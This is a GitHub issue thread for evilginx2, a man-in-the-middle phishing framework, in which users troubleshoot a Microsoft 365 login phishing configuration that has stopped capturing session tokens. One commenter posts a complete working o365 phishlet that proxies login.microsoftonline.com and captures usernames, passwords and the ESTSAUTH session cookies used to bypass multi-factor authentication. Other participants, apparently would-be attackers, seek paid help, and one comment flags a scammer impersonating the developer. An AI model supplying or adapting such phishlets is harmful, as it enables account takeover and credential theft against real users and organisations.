kgretzky / evilginx2

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
BSD 3-Clause "New" or "Revised" License

Doesn't capture the token (O365) #691

Closed afiqizzuddinz closed 1 year ago

afiqizzuddinz commented 2 years ago

DO NOT ASK FOR PHISHLETS.

DO NOT ASK FOR HELP CREATING PHISHLETS.

DO NOT ASK TO FIX PHISHLETS.

DO NOT ADVERTISE OR TRY TO SELL PHISHLETS.

EXPECT A BAN OTHERWISE. THANK YOU!

REPORT ONLY BUGS OR FEATURE SUGGESTIONS.

Hello, I want to ask: O365 doesn't capture the token. Do I need to configure the phishlets, or is there something else? My account has MFA enabled.

oposm commented 2 years ago

Hi,

The SignInStateCookie needs its domain changed to '.login.microsoftonline.com' for token capturing to start working again.

auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
#  - domain: 'login.microsoftonline.com'
#    keys: ['SignInStateCookie']

maggy-1 commented 2 years ago

The problem I am having right now is that I cannot locate the session cookies. I do not know where to copy them from. Anyone that can help me? I was able to capture the username and password. In the token section it says "None".

oposm commented 2 years ago

Replace the o365.yaml phishlet with the following and token capturing should start working again.

name: 'o365'
author: '@jamescullum'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing: false}
  # The lines below are needed if your target organization utilizes ADFS.
  # If they do, you need to uncomment all following lines that contain <...>
  # To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
  # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as follows:
  #    <insert-adfs-subdomain> = adfs
  #    <insert-adfs-host> = example.com
  #    <insert-adfs-subdomain-and-host> = adfs.example.com
  #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>', session: true, is_landing: false}
  #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>:443', session: true, is_landing: false}
sub_filters:
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  # Uncomment and fill in if your target organization utilizes ADFS
  #- {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
credentials:
  username:
    key: '(login|UserName)'
    search: '(.*)'
    type: 'post'
  password:
    key: '(passwd|Password)'
    search: '(.*)'
    type: 'post'
login:
  domain: 'login.microsoftonline.com'
  path: '/'

maggy-1 commented 2 years ago

Thank you for your reply. But this is beyond my comprehension. I swear I do not know how I can replace the o365.yaml phishlet. Is there anyone you can recommend who can assist me further, please?

MelroyB commented 2 years ago

see: #677 (https://github.com/kgretzky/evilginx2/issues/677)

maggy-1 commented 2 years ago

Thank you so much for your quick response. Please, is there anyone I can add on Telegram or any other platform who can teach me or show me how to do this? I am willing to learn, please.

MelroyB commented 2 years ago

But are you willing to search for basic commands?

https://www.howtogeek.com/howto/42980/the-beginners-guide-to-nano-the-linux-command-line-text-editor/

maggy-1 commented 2 years ago

No, I am not. I am looking for someone who can connect via SSH and help me fix it, even if it's for a fee. That is the reason I want to connect with the person via Telegram or any other platform. Please help me.

maggy-1 commented 2 years ago

Hello, I have been able to replace the o365.yaml phishlet with the following below, yet the O365 token isn't captured. What can I do, please?

name: 'o365' author: '@jamescullum' min_ver: '2.3.0' proxy_hosts:

asapx6 commented 2 years ago

All issues can be fixed.... It's caused due to an update on the target end..... You can reach out to the developer on ICQ @mrgretzky

Kevin3-00 commented 2 years ago

All issues can be fixed.... It's caused due to an update on the target end..... You can reach out to the developer on ICQ @mrgretzky

You are a scammer using kgretzky's ID to scam people for phishlets. Guys, beware of him.